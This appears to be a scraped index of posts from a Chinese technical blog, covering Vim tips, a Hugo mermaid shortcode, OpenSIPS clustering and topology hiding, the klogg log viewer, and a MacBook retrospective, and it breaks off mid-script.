文件对比 如果你安装了vim, vimdiff就会自动携带\nvimdiff a.txt b.txt 9. 在插入模式快速删除 C-h 删除前一个字符 C-w 删除前一个单词 C-u 删除到行首 10. 在多行末尾增加特定的字符 例如下面的命令,可以在多行末尾增加;\n:%s/$/;/ 11. 对撤销进行撤销 u可以用来撤销,C-r可以用来对撤销进行撤销\n12. 重新读取文件 假如你对一个文件进行了一些修改,但是还没有保存,这时你想丢弃这些修改,如果用撤销的话,太麻烦。\n你可以用下面的命令,让vim重新读取磁盘上的文件,覆盖当前buffer中的文件。\n:e! 13. 对当前buffer执行外部命令 例如对go代码进行格式化\n:!go fmt % 也可以是一个json文件,我们可以用行选中之后执行:'\u0026lt;,'\u0026gt;!jq, 如果需要对全文进行json格式化,可以使用:%!jq\n{\u0026#34;name\u0026#34;:\u0026#34;wdd\u0026#34;,\u0026#34;age\u0026#34;:1} { \u0026#34;name\u0026#34;: \u0026#34;wdd\u0026#34;, \u0026#34;age\u0026#34;: 1 } Warning !和命令之间不能有空格 14. 只读模式打开文件 只读模式打开文件: vim -R file 禁止修改打开文件: vim -M file 15. 显示或者隐藏特殊字符 :set list :set nolist 16. 把另一个文件读取到当前buffer里面 b.txt是另一个文件\n# 读取到光标的位置 :read b.txt # 读取到当前buffer的开头 :0read b.txt # 读取到当前buffer的结尾 :$read b.txt 17. 把当前文件的一部分写入到另一个文件中 # 把当前文件写入到c.txt, 如果c.txt存在,则写入失败 :write c.txt # 把当前文件写入到c.txt, 如果c.txt存在,则强制写入 # 注意这里!必须紧跟着write, 并且空格是必须的,否则就是执行外部命令了 :write! c.txt # 把当前文件的当前行到文件末尾写入到c.txt :.,$write c.txt # 把当前文件以追加的方式写入到另一个文件中 :write \u0026gt;\u0026gt;c.txt 18. 自带文件浏览器的必背命令 :Sex # 文件浏览器上下分布 :Vex # 文件浏览器左右分布 F1 打开帮助信息 % 创建文件 d 创建目录 D 删除文件或者目录 R 文件重命名 gh 隐藏以.开头的文件 - 返回上一级 t 用新的标签页面打开文件 c 把浏览的目录设置为当前工作的目录 19. 执行命令后,快速进入插入模式 C 从光标处删除到行尾,然后进入插入模式 S 清空当前行的内容,然后进入插入模式 s 删除光标下的字符,然后进入插入模式 O\t在当前行上插入一行,然后进入插入模式 o\t在当前行下插入一行,然后进入插入模式 I\t光标移动到当前行的第一个字符前,然后进入插入模式 A\t光标移动到当前行的最后一个字符后,然后进入插入模式 20. 必会的几个寄存器 有名寄存器 a-z 黑洞寄存器 _ 表达式寄存器 = 当前文件名寄存器 % 上次查找的模式寄存器 / 复制专用寄存器 0 C-r 是用来调用寄存器的。比如说我想粘贴当前文件名,我只需要按C-r %, 就可以自动粘贴到当前的文件中\n21. 基于tag的跳转 C-] 跳到对应tag上 C-o 跳回来 C-t 跳回来 C-w ] 在新的window中打开标签 C-w } 预览 pclose 关闭预览 22. html标签删除 dit 删除标签内部的元素 dat 删除标签 23. 原始格式粘贴 如果粘贴到vim中的文本缩进出现问题,\n:set paste 然后再执行C-v粘贴\n取消粘贴模式用 :set nopaste\n24. 按列删除或者按列保留 # 只保留第二列 :%!awk \u0026#39;{print $2}\u0026#39; # 删除第二列 :%!awk \u0026#39;{$2=\u0026#34;\u0026#34;;print $0}\u0026#39; 25. 查找多个关键词 /key1\\|key2\\|key3 26. 快速将光标所在行移动到屏幕中央 zz 26. 
窗口快捷键 工作区切分窗口命令 s 水平切分窗口,新窗口仍然显示当前缓冲区 v 垂直切分窗口,新窗口仍然显示当前缓冲区 sp {file} 水平切分当前窗口,新窗口中载入file vsp {file} 垂直切分窗口,并在新窗口载入file 窗口之间切换 w 在窗口间循环切换 h 切换到左边窗口 l 切换到右边窗口 j 切换到下边的窗口 k 切换到上边的窗口 窗口关闭 :clo[se] 关闭活动窗口 :on[ly] 关闭其他窗口 窗口改变大小 = 使所有窗口等宽等高 _ 最大化活动窗口的高度 | 最大化活动 27. 9种插入模式 i 进入插入模式,所输入新的内容将会在正常模式所在光标的前面 a 进入插入模式,所输入的新的内容将会在正常模式所在光标的后面 你知道从插入模式退出的时候,光标会向前移动一个字符吗?\n进入插入模式的技巧\ni 在光标前插入 a 在光标后插入 A 在行的末尾进入插入 I (大写的i), 在行的第一个非空白字符前进入插入模式 C 删除光标后的所有字符,然后进入插入模式 s 删除光标后的一个字符,然后进入插入模式 S 清空当前行,然后进入插入模式 o 在当前行的下面一行新建一行,并进入插入模式 O 在当前行的上面一行新建一行,并进入插入模式 28. 算数运算 ctrl a 对数字进行加运算, 如果光标不在数字上,将会自动向后移动到对应的数字上 ctrl x 对数字进行减运算 29. 可视模式快捷键 v 激活面向字符的可视模式 再按一次,可以退出 V 激活面向行的可视模式, 再按一次可以退出 ctrl v 激活面向列的可视模式 gv 重选上次的选区 o 移动选区的端点 30. 把光标所在的单词插入到Ex C-r C-w 31. 全局 文件另存为 :saveas filename 关闭当前窗口 :close 32. 光标移动 移动光标到页面顶部,中部,底部 H,M,L 移动到下个单词开头,结尾 w,e 移动到上个单词开头 b 移动光标 上下左右 k,j,h,l 移动到匹配的括号 % 移动到行首 0 移动到行首非空白字符 ^ 移动到行尾非空白字符 g_ 移动到行尾 $ 移动到文件第一行 gg 移动到文件最后一行 G 移动到第10行 10G 移动屏幕使光标居中 zz 跳转到上一次的位置 ctrl+o 例如你在159行,然后你按了gg, 光标跳到了第一行,然后你按ctrl+o, 光标会回到159行 跳转到下一次的位置 ctrl+i 跳转到下个同样单词的地方 * 跳转到上个同样单词的地方 # 跳到字符a出现的位置 fa, Fa 跳到字符a出现的前一个位置 ta, Ta 跳到之前的位置 `` 跳到之前修改的位置 `. 跳到选区的起始位置 `\u0026lt; 跳到选区的结束位置 `\u0026gt; 33. 滚动屏幕 向下,向上滚动一屏 ctrl+f, ctrl+b 向下,向上滚动半屏 ctrl+d, ctrl+u 34. 插入模式 光标前、后插入 i,a 行首,行尾插入 I, A 在当前行上、下另起一行插入 O, o 从当前单词末尾插入 ea 退出插入模式 esc 删除前一个单词 ctrl+w 删除到行首 ctrl+u 35. 编辑 替换光标下的字符 r 将下一行合并到当前行 J 将下一行合并到当前行,且不插入空格 gJ 清空当前行,并进入插入模式 cc 清空当前单词,并进入插入模式 cw 撤销修改 u 删除光标下的一个字符,然后进入插入模式 s 36. 选择文本 普通光标选择, 进入选择文本模式 v 行选择,进入选择文本模式 V 块选择,进入选择文本模式 ctrl+v 在多行行首插入注释# ctrl+v 然后选择块,然后输入I, 然后输入#, 然后按esc 注意,输入I指令时,光标只会定位到一个位置,编辑的内容也只是在一个位置,但是按了esc后,多行都会出现# 进入选择文本模式之后 选择光标所在单词(光标要先位于单词上) aw 选择光标所在()区域,包括(), 光标要先位于一个括号上 ab 选择光标所在[]区域,包括[], 光标要先位于一个括号上 a] 选择光标所在()区域,不包括(), 光标要先位于一个括号上 ib 选择光标所在[]区域,不包括[], 光标要先位于一个括号上 i] 退出可视化区域 esc 37. 选择文本命令 向左右缩进 \u0026lt;, \u0026gt; 复制 y 剪切 d 大小写转换 ~ 38. 标记 显示标记列表 :marks 标记当前位置为a ma 跳转到标记a的位置 `a 39. 
剪切删除 剪切当前行 dd 剪切2行 2dd 剪切当前单词 dw 从光标所在位置剪切到行尾 D, d$ 剪切当前字符 x 删除单引号中的内容 di\u0026#39; da\u0026#39; 删除包括\u0026#39; 删除双引号中的内容 di\u0026quot; da\u0026quot; 删除包括\u0026quot; 删除中括号中的内容 di[ da[ 删除包括[ 删除大括号中的内容 di{ da{ 删除包括{ 删除括号中的内容 di( da( 删除包含( 从当前光标位置,删除到字符a dta 40. global命令 删除所有不包含匹配项的文本行 :v/re/d re可以是字符,也可以是正则 显示所有不包含匹配项的文本行 :v/re/p re可以是字符,也可以是正则 删除包含匹配项的行 :g/re/d re可以是字符,也可以是正则 显示所有包含匹配项的行 :g/re/p re可以是字符,也可以是正则 41. 文本对象 当前单词 iw 当前单词和一个空格 aw 当前句子 is 当前句子和一个空格 as 当前段落 ip 当前段落和一个空行 ap 一对圆括号 a) 或 ab 圆括号内部 i) 或 ib 一对花括号 a}或 aB 花括号内部 i}或 iB a表示匹配两点和两点之间的字符), }, ], \u0026gt; , \u0026#39;, \u0026#34;, `, t(xml) i表示匹配两点内部之间的字符 42. 复制 复制当前行 yy 复制2行 2yy 复制当前单词 yw 从光标所在位置复制到行尾 y$ 复制单引号中的内容 yi\u0026#39; ya\u0026#39; 复制包括\u0026#39; 复制双引号中的内容 yi\u0026quot; ya\u0026quot; 复制包括\u0026quot; 复制中括号中的内容 yi[ ya[ 复制包括[ 复制大括号中的内容 yi{ ya{ 复制包括{ 43. 粘贴 在光标后粘贴 p 在光标前粘贴 P 44. 保存退出 保存 w 保存并退出 wq 不保存退出 q! 保存所有tab页并退出 wqa 46. 查找 向下查找key /key 向上查找key ?key 下一个key n 上一个key N 移除搜索结果高亮 :noh 设置搜索高亮 :set hlsearch 统计当前模式匹配的个数 :%s///gn 47. 字符串替换 全文将old替换为new %s/old/new/g 全文将old替换为new, 但是会一个一个确认 %s/old/new/gc 48. 多文件搜索 多文件搜索 :vimgrep /key/ {file} vimgrep /export/ */ 切换到下一个文件 :cn 切换到上一个文件 :cp 查看搜索结果列表 :copen 查看文件缓冲区 :ls 49. 窗口分割 水平分割窗口 :split 默认split仅针对当前文件,如果在新窗口打开新的文件,可以:split file 垂直分割窗口 :vsplit 打开空白的窗口 :new 关闭分割的窗口 ctrl+wq, :close 有时候ctrl+wq不管用,需要用close 窗口之间切换 ctrl+ww 切换到左边窗口 ctrl+wh 切换到右边窗口 ctrl+wl 切换到下边窗口 ctrl+wj 切换到上边窗口 ctrl+wk 关闭所有窗口 :qall 这表示 \u0026ldquo;quit all\u0026rdquo; (全部退出)。如果任何一个窗口没有存盘,Vim 都不会退出。同时光标会自动跳到那个窗口,你可以用 \u0026ldquo;:write\u0026rdquo; 命令保存该文件或者 \u0026ldquo;:quit!\u0026rdquo; 放弃修改。 保存所有窗口修改后的内容 :wall 如果你知道有窗口被改了,而你想全部保存 关闭所有窗口,放弃所有修改 :qall! 注意,这个命令是不能撤销的。 保存所有修改,然后退出vim :wqall 窗口更多内容 http://vimcdoc.sourceforge.net/doc/usr_08.html#usr_08.txt\n50. 宏 录制宏a qa 停止录制宏 q 51. 标签页 新建标签页 tabnew 在新标签页中打开file tabnew file 切换到下个标签页 gt 切换到上个标签页 gT 关闭当前标签页 :tabclose, :tabc 关闭其他标签页 :tabo, :tabonly 在所有标签页中执行命令 :tabdo command :tabdo w 52. 
文本折叠 折叠文本内容 zfap http://vimcdoc.sourceforge.net/doc/usr_28.html#usr_28.txt 打开折叠 zo 关闭折叠 zc 展开所有折叠 zr 打开所有光标行上的折叠用 zO 关闭所有光标行上的折叠用 zC 删除一个光标行上的折叠用 zd 删除所有光标行上的折叠用 zD 53. 设置 设置vim编辑器的宽度 set columns=200 54. 自动补全 使用自动补全的下一个列表项 ctrl+n 使用自动补全的上一个列表项 ctrl+p 确认当前选择项 ctrl+y 还原最早输入项 ctrl+e 55. 杂项 在vim中执行外部命令 :!ls -al 查看当前光标所在行与百分比 ctrl+g 挂起vim, 使其在后台运行 ctrl+z 查看后台挂起的程序 jobs 使挂起的vim前台运行 fg 如果有多个后台挂起的任务, 则需要指定任务序号,如 fg %1 在每行行尾添加字符串abc :%s/$/abc 在每行行首添加字符串abc :%s/^/abc 每行行尾删除字符串abc :%s/abc$// 每行行首删除字符串abc :%s/^abc// 删除含有abc字符串的行 :g/abc/d 删除每行行首到特定字符的内容,非贪婪匹配 :%s/^.\\{-}abc// var = abc123, 会删除var = abc 调换当前行和它的下一行 ddp 全文格式化 gg 跳到第一行 shift v shift g = 参考\nhttps://vim.rtorr.com/lang/zh_cn http://vimcdoc.sourceforge.net/doc/help.html https://www.oschina.net/translate/learn-vim-progressively ","permalink":"https://wdd.js.org/vim/vim-tips/","summary":"Info C表示按住Ctrl, C-o表示同时按住Ctrl和o 1. 在tmux中 vim-airline插件颜色显示不正常 解决方案:\nexport TERM=screen-256color 2. buffer相关操作 :ls # 显示所有打开的buffer :b {bufferName} #支持tab键自动补全 :bd # 关闭当前buffer :bn # 切换到下一个buffer :bp # 切换到上一个buffer :b# # 切换到上一个访问过的buffer :b1 # 切换到buffer1 :bm # 切换到最近修改过的buffer :sb {bufferName} # 上下分屏 :vert sb {bufferName} # 左右分屏 3. 跳转到对应的符号上 下面这种符号,一般都是成双成对的,只要在其中一个上按%, 就会自动跳转到对应的符号\n() [] {} 4. 关闭netrw的banner 如果熟练地使用了netrw,就可以把默认开启的banner给关闭掉。\nlet g:netrw_banner = 0 let g:netrw_liststyle = 3 let g:netrw_winsize = 25 5. 如何同时保存所有发生变化的文件? 
把所有发生变化的文件给保存 :wa 把所有发生变化的文件都保存,然后退出vim :xa 退出vim, 所有发生变化的文件都不保存,:qa!","title":"1001个Vim高级技巧 - 0-55"},{"content":"增加mermaid shortcodes 在themes/YourTheme/layouts/shortcodes/mermaid.html 增加如下内容\n\u0026lt;script async type=\u0026#34;application/javascript\u0026#34; src=\u0026#34;https://cdn.jsdelivr.net/npm/mermaid@9.1.1/dist/mermaid.min.js\u0026#34;\u0026gt; var config = { startOnLoad:true, theme:\u0026#39;{{ if .Get \u0026#34;theme\u0026#34; }}{{ .Get \u0026#34;theme\u0026#34; }}{{ else }}dark{{ end }}\u0026#39;, align:\u0026#39;{{ if .Get \u0026#34;align\u0026#34; }}{{ .Get \u0026#34;align\u0026#34; }}{{ else }}center{{ end }}\u0026#39; }; mermaid.initialize(config); \u0026lt;/script\u0026gt; \u0026lt;div class=\u0026#34;mermaid\u0026#34;\u0026gt; {{.Inner}} \u0026lt;/div\u0026gt; 在blog中增加如下代码 Warning 注意下面的代码,你在实际写的时候,要把 /* 和 */ 删除 {{/*\u0026lt; mermaid align=\u0026#34;left\u0026#34; theme=\u0026#34;neutral\u0026#34; */\u0026gt;}} pie title French Words I Know \u0026#34;Merde\u0026#34; : 50 \u0026#34;Oui\u0026#34; : 35 \u0026#34;Alors\u0026#34; : 10 \u0026#34;Non\u0026#34; : 5 {{/*\u0026lt; /mermaid \u0026gt;*/}} pie title French Words I Know \"Merde\" : 50 \"Oui\" : 35 \"Alors\" : 10 \"Non\" : 5 sequenceDiagram title French Words I Know autonumber Alice-\u003e\u003eBob: hello Bob--\u003e\u003eAlice: hi Alice-\u003eBob: talking ","permalink":"https://wdd.js.org/posts/2022/05/02-hugo-add-mermaid/","summary":"增加mermaid shortcodes 在themes/YourTheme/layouts/shortcodes/mermaid.html 增加如下内容\n\u0026lt;script async type=\u0026#34;application/javascript\u0026#34; src=\u0026#34;https://cdn.jsdelivr.net/npm/mermaid@9.1.1/dist/mermaid.min.js\u0026#34;\u0026gt; var config = { startOnLoad:true, theme:\u0026#39;{{ if .Get \u0026#34;theme\u0026#34; }}{{ .Get \u0026#34;theme\u0026#34; }}{{ else }}dark{{ end }}\u0026#39;, align:\u0026#39;{{ if .Get \u0026#34;align\u0026#34; }}{{ .Get \u0026#34;align\u0026#34; }}{{ else }}center{{ end }}\u0026#39; }; mermaid.initialize(config); 
\u0026lt;/script\u0026gt; \u0026lt;div class=\u0026#34;mermaid\u0026#34;\u0026gt; {{.Inner}} \u0026lt;/div\u0026gt; 在blog中增加如下代码 Warning 注意下面的代码,你在实际写的时候,要把 /* 和 */ 删除 {{/*\u0026lt; mermaid align=\u0026#34;left\u0026#34; theme=\u0026#34;neutral\u0026#34; */\u0026gt;}} pie title French Words I Know \u0026#34;Merde\u0026#34; : 50 \u0026#34;Oui\u0026#34; : 35 \u0026#34;Alors\u0026#34; : 10 \u0026#34;Non\u0026#34; : 5 {{/*\u0026lt; /mermaid \u0026gt;*/}} pie title French Words I Know \"","title":"hugo博客增加mermaid 绘图插件"},{"content":"共享分机注册信息有两种方式\n集群使用相同的数据库,多个节点实时读取数据 优点:使用简单,即使所有节点重启,也能立即从数据库中恢复分机注册数据 缺点:对数据库过于依赖,一旦数据库出现性能瓶颈,则会立即影响所有的呼叫 使用cluster模块,不使用数据库,通过opensips自带的二进制同步方式 优点:不用数据库,消息处理速度快,减少对数据库的压力 缺点:一旦所有节点挂掉,所有的分机注册信息都会损失。但是挂掉所有节点的概率还是比较小的。 今天要讲的方式就是通过cluster的方式进行共享注册信息的方案。\n假设有三个节点:\n在其中一个节点上注册的分机信息会同步给其他的节点 假设其中节点a重启了,节点a会自动选择b或者c来拉取第一次初始化的分机信息 举例来说:\n8001分机在b上注册成功 b把8001的注册信息通过cluster模块通知给a和c 8002分机在a上注册成功 a把8002的注册信息通过cluster模块通知给b和c 此时整个集群有两个分机8001和8002 节点c突然崩溃重启 节点c重启之后,向b发出请求,获取所有注册的分机 节点b向节点c推送全量的分机注册信息 此时三个节点又恢复同步状态 cluster表设计:\n空的字段我就没写了,flags字段必须设置为seed, 这样节点重启后,才知道要向哪个节点同步全量数据 id,cluster_id,node_id,url,state,flags 1,1,1,bin:a:5000,1,seed 2,1,2,bin:b:5000,1,seed 3,1,3,bin:c:5000,1,seed 脚本修改:\n# 增加 bin的listen, 对应cluster表的url listen=bin:192.168.2.130:5000 # 加载proto_bin和clusterer模块 loadmodule \u0026#34;proto_bin.so\u0026#34; loadmodule \u0026#34;clusterer.so\u0026#34; modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql:xxxx\u0026#34;) # 设置数据库地址 modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;current_id\u0026#34;, 1) # 设置当前node_id modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;full-sharing-cluster\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;location_cluster\u0026#34;, 1) # 设置当前的集群id 其他操作保持原样,opensips就会自动同步分机数据了。\n","permalink":"https://wdd.js.org/opensips/ch9/cluster-share-location/","summary":"共享分机注册信息有两种方式\n集群使用相同的数据库,多个节点实时读取数据 优点:使用简单,即使所有节点重启,也能立即从数据库中恢复分机注册数据 
缺点:对数据库过于依赖,一旦数据库出现性能瓶颈,则会立即影响所有的呼叫 使用cluster模块,不使用数据库,通过opensips自带的二进制同步方式 优点:不用数据库,消息处理速度快,减少对数据库的压力 缺点:一旦所有节点挂掉,所有的分机注册信息都会损失。但是挂掉所有节点的概率还是比较小的。 今天要讲的方式就是通过cluster的方式进行共享注册信息的方案。\n假设有三个节点:\n在其中一个节点上注册的分机信息会同步给其他的节点 假设其中节点a重启了,节点a会自动选择b或者c来拉取第一次初始化的分机信息 举例来说:\n8001分机在b上注册成功 b把8001的注册信息通过cluster模块通知给a和c 8002分机在a上注册成功 a把8002的注册信息通过cluster模块通知给b和c 此时整个集群有两个分机8001和8002 节点c突然崩溃重启 节点c重启之后,向b发出请求,获取所有注册的分机 节点b向节点c推送全量的分机注册信息 此时三个节点又恢复同步状态 cluster表设计:\n空的字段我就没写了,flags字段必须设置为seed, 这样节点重启后,才知道要向哪个节点同步全量数据 id,cluster_id,node_id,url,state,flags 1,1,1,bin:a:5000,1,seed 2,1,2,bin:b:5000,1,seed 3,1,3,bin:c:5000,1,seed 脚本修改:\n# 增加 bin的listen, 对应cluster表的url listen=bin:192.168.2.130:5000 # 加载proto_bin和clusterer模块 loadmodule \u0026#34;proto_bin.so\u0026#34; loadmodule \u0026#34;clusterer.so\u0026#34; modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql:xxxx\u0026#34;) # 设置数据库地址 modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;current_id\u0026#34;, 1) # 设置当前node_id modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;full-sharing-cluster\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;location_cluster\u0026#34;, 1) # 设置当前的集群id 其他操作保持原样,opensips就会自动同步分机数据了。","title":"集群共享分机注册信息"},{"content":"项目信息 github地址 https://github.com/variar/klogg\n1. 安装 klogg是个跨平台软件,windows, mac, linux都可以安装。具体安装方式参考github项目地址\n2. 界面布局 文件信息栏 日志栏 过滤器设置栏 过滤后的日志显示栏 3. 文件加载 klogg支持多种方式加载日志文件\n将日志文件拖动到klogg中 直接将常见的压缩包文件拖动到klogg中,klogg将会自动将其解压后展示 支持从http url地址下载日志,然后查看 支持从剪贴板复制日志,然后展示 4. 过滤表达式 因为klogg支持正则过滤,所以它的功能就非常强悍了。\n逻辑表达式\n表达式 例子 备注 与 and \u0026ldquo;open\u0026rdquo; and \u0026ldquo;close\u0026rdquo; 包含open,并且包含close 或 or \u0026ldquo;open\u0026rdquo; or \u0026ldquo;close\u0026rdquo; 包含open, 或者 close 非 not not(\u0026ldquo;open\u0026rdquo;) 不包含open 与或非同时支持复杂的运算,例如包含open 但是不包含close: \u0026quot;open\u0026quot; and not(\u0026quot;close\u0026quot;)\n5. 
快捷方式 klogg的快捷方式很多参考了vim, vim使用者非常高兴。\n键 动作 arrows 上下或者左右移动 [number] j/k 支持用j/k上下移动 h/l 支持用h/l左右移动 ^ or $ 滚动到某行的开始或者结尾 [number] g 跳到对应的行 entered G 跳到第一行 Shift+G 跳到最后一行 Alt+G 显示跳到某一行的对话框 \u0026rsquo; or \u0026quot; 在当前屏幕快速搜索 (forward and backward) n or N 向前或者向后跳 * or . search for the next occurrence of the currently selected text / or , search for the previous occurrence of the currently selected text f 流的方式,类似 tail -f m 标记某一行,标记后的行会自动加入过滤结果中 [ or ] 跳转到上一个或者下一标记点 + or - 调整过滤窗口的尺寸 v 循环切换各种显示模式- Matches: 只显式匹配的内容- Marks: 只显式标记的内容- Marks and Matchs:显示匹配和标记的内容 (Marks and Matches -\u0026gt; Marks -\u0026gt; Matches) F5 重新加载文件 Ctrl+S Set focus to search string edit box Ctrl+Shift+O 打开对话框去选择其他文件 参考 https://github.com/variar/klogg/blob/master/DOCUMENTATION.md ","permalink":"https://wdd.js.org/posts/2022/04/cipwms/","summary":"项目信息 github地址 https://github.com/variar/klogg\n1. 安装 klogg是个跨平台软件,windows, mac, linux都可以安装。具体安装方式参考github项目地址\n2. 界面布局 文件信息栏 日志栏 过滤器设置栏 过滤后的日志显示栏 3. 文件加载 klogg支持多种方式加载日志文件\n将日志文件拖动到klogg中 直接将常见的压缩包文件拖动到klogg中,klogger将会自动将其解压后展示 支持从http url地址下载日志,然后查看 支持从剪贴板复制日志,然后展示 4. 过滤表达式 因为klogg支持正则过滤,所以他的功能就非常强悍了。\n逻辑表达式\n表达式 例子 备注 与 and \u0026ldquo;open\u0026rdquo; and \u0026ldquo;close\u0026rdquo; 包含open,并且包含close 或 or \u0026ldquo;open\u0026rdquo; or \u0026ldquo;close\u0026rdquo; 包含open, 或者 close 非 not not(\u0026ldquo;open\u0026rdquo;) 不包含open 与或非同时支持复杂的运算,例如包含open 但是不包含close: \u0026quot;open\u0026quot; and not(\u0026quot;close\u0026quot;)\n5. 
快捷方式 klogg的快捷方式很多参考了vim, vim使用者非常高兴。\n键 动作 arrows 上下或者左右移动 [number] j/k 支持用j/k上下移动 h/l 支持用h/l左右移动 ^ or $ 滚动到某行的开始或者结尾 [number] g 跳到对应的行 entered G 跳到第一行 Shift+G 跳到最后一行 Alt+G 显示跳到某一行的对话框 \u0026rsquo; or \u0026quot; 在当前屏幕快速搜索 (forward and backward) n or N 向前或者向后跳 * or .","title":"klogg: 目前我最喜欢的日志查看工具"},{"content":"这个报错比较容易出现在tcp转udp的场景,可以看以下的时序图\nab之间用tcp通信,bc之间用udp通信。在通话建立后,c给b发送了bye请求,但是b发送给了c 477。正常来说b应该把bye转发给a.\n那么问题出在哪里呢?\n问题就出在update请求的响应上,update的响应200ok中带有Contact头,如果是Contact是个nat的地址,没有经过fixed nat, 那么b是无法直接给nat内部的地址发送请求的。\n处理的办法也很简单,就是在收到a返回的200ok时,执行fix_nated_contact()\n遇到这种问题,往往进入一种思维误区,就是在INVITE请求成功后,fix了nat Contact后,Contact头是不会变的。\n但是实际上,很多SIP请求,例如NOTIFY, UPDATE都会携带请求和响应都会携带Contact, 如果只处理了INVITE的Contact头,没有处理其他携带Contact的sip请求或者响应,就必然也会遇到类似的问题。\n我们知道SIP的Contact后,决定了序列化请求的request url。如果Contact处理的有问题,必然在按照request url转发的时候出现问题。\n综上所述:无论请求还是响应,都要考虑这个消息是否携带了Contact头,以及是否需要fix nat Contact。\n","permalink":"https://wdd.js.org/opensips/ch7/tm-send-failed/","summary":"这个报错比较容易出现在tcp转udp的场景,可以看以下的时序图\nab之间用tcp通信,bc之间用udp通信。在通话建立后,c给b发送了bye请求,但是b发送给了c 477。正常来说b应该把bye转发给a.\n那么问题出在哪里呢?\n问题就出在update请求的响应上,update的响应200ok中带有Contact头,如果是Contact是个nat的地址,没有经过fixed nat, 那么b是无法直接给nat内部的地址发送请求的。\n处理的办法也很简单,就是在收到a返回的200ok时,执行fix_nated_contact()\n遇到这种问题,往往进入一种思维误区,就是在INVITE请求成功后,fix了nat Contact后,Contact头是不会变的。\n但是实际上,很多SIP请求,例如NOTIFY, UPDATE都会携带请求和响应都会携带Contact, 如果只处理了INVITE的Contact头,没有处理其他携带Contact的sip请求或者响应,就必然也会遇到类似的问题。\n我们知道SIP的Contact后,决定了序列化请求的request url。如果Contact处理的有问题,必然在按照request url转发的时候出现问题。\n综上所述:无论请求还是响应,都要考虑这个消息是否携带了Contact头,以及是否需要fix nat Contact。","title":"opensips 477 Send failed (477/TM)"},{"content":"我之前写过一篇文章《macbook pro使用三年后的感受》,今天这篇文章是用4.5年的感受。\n再次梳理一下,中间遇到过的问题\n蝴蝶键盘很早有有些问题了,最近疫情在家,键盘被用坏了,J键直接坏了。只能外接键盘来用 屏幕下方出现淡红色的纹路,不太明显,基本不影响使用 中间我自己给macbook换过一次电池,换电池之前只要不插电,macbook很容易就关机了 风扇经常转,噪音有点吵,我已经觉得无所谓了 17年买这台电脑的时候,应该是9400左右。配置应该是最低配的 i5双核2.3Ghz, 
8G内存,128G硬盘的。\n有些人可能惊讶,128G的硬盘怎么能够用的。但是我的确够用,我的磁盘还有将近50G的剩余空间呢。\n我不是视频或者影音工作者,用的软件比较少。整个应用程序所占用的空间才4个多G。剩下的文稿可能大部分是代码。\n由于我基本上都是远程用ssh连上nuc上开发,所以mac上的资料更少。\n但是macbook键盘坏了这个问题,是不能忍的。偶尔要移动办公的时候,不可能再带个外接键盘吧。\n是时候准备和陪伴我4.5年的电脑说再见了。\n本来想买14寸的macbook pro m1的,但是重量的增加以及很丑的刘海也是我不能忍的。\n所以我觉得我会买一台轻便点的windows笔记本,而且windows还有一个很吸引我的点,就是linux子系统。这个linux子系统,要比mac的系统更加linux。\n各位同学有没有推荐的windows的轻便笔记本呢?\n","permalink":"https://wdd.js.org/posts/2022/04/er3vob/","summary":"我之前写过一篇文章《macbook pro使用三年后的感受》,今天这篇文章是用4.5年的感受。\n再次梳理一下,中间遇到过的问题\n蝴蝶键盘很早就有些问题了,最近疫情在家,键盘被用坏了,J键直接坏了。只能外接键盘来用 屏幕下方出现淡红色的纹路,不太明显,基本不影响使用 中间我自己给macbook换过一次电池,换电池之前只要不插电,macbook很容易就关机了 风扇经常转,噪音有点吵,我已经觉得无所谓了 17年买这台电脑的时候,应该是9400左右。配置应该是最低配的 i5双核2.3Ghz, 8G内存,128G硬盘的。\n有些人可能惊讶,128G的硬盘怎么能够用的。但是我的确够用,我的磁盘还有将近50G的剩余空间呢。\n我不是视频或者影音工作者,用的软件比较少。整个应用程序所占用的空间才4个多G。剩下的文稿可能大部分是代码。\n由于我基本上都是远程用ssh连上nuc上开发,所以mac上的资料更少。\n但是macbook键盘坏了这个问题,是不能忍的。偶尔要移动办公的时候,不可能再带个外接键盘吧。\n是时候准备和陪伴我4.5年的电脑说再见了。\n本来想买14寸的macbook pro m1的,但是重量的增加以及很丑的刘海也是我不能忍的。\n所以我觉得我会买一台轻便点的windows笔记本,而且windows还有一个很吸引我的点,就是linux子系统。这个linux子系统,要比mac的系统更加linux。\n各位同学有没有推荐的windows的轻便笔记本呢?","title":"macbook pro 使用1664天的感受"},{"content":"1. 拓扑隐藏功能 删除Via头 删除Route 删除Record-Route 修改Contact 可选隐藏Call-ID 如下图所示,根据SIP的Via, Route, Record-Route的头,往往可以推测服务内部的网络结构。\n我们不希望别人知道的我们的内部网络结构。我们只希望只能看到C这个sip server。经过拓扑隐藏过后\n用户看不到关于a、b的via, route, record-route头 用户看到的Contact头被修改成C的IP地址 可以选择把原始的Call-ID也修改 当然,拓扑隐藏除了可以隐藏一些信息,也有一个其他的好处:减少SIP消息包的长度。如果SIP消息用UDP传输,减少包的体积,可以大大降低UDP分片的可能性。\n所以,综上所述:拓扑隐藏有以下好处\n隐藏服务内部网络结构 减少SIP包的体积 2. 
脚本例子 拓扑隐藏的实现并不复杂。首先要加载拓扑隐藏的模块\nloadmodule \u0026#34;topology_hiding.so\u0026#34; 2.1 初始化路由的处理 在初始化路由里,只需要调用topology_hiding()\nU 表示不隐藏Contact的用户名信息 C 表示隐藏Call-ID # if it\u0026#39;s an INVITE dialog, we can create the dialog now, will lead to cleaner SIP messages if (is_method(\u0026#34;INVITE\u0026#34;)) create_dialog(); # we do topology hiding, preserving the Contact Username and also hiding the Call-ID topology_hiding(\u0026#34;UC\u0026#34;); t_relay(); exit; 2.2 序列化路由的处理 在序列化请求中,只需要调用topology_hiding_match(), 后续的就可以交给OpenSIPS处理了。\nif (has_totag()) { if (topology_hiding_match()) { xlog(\u0026#34;Succesfully matched this request to a topology hiding dialog. \\n\u0026#34;); xlog(\u0026#34;Calller side callid is $ci \\n\u0026#34;); xlog(\u0026#34;Callee side callid is $TH_callee_callid \\n\u0026#34;); t_relay(); exit; } else { if ( 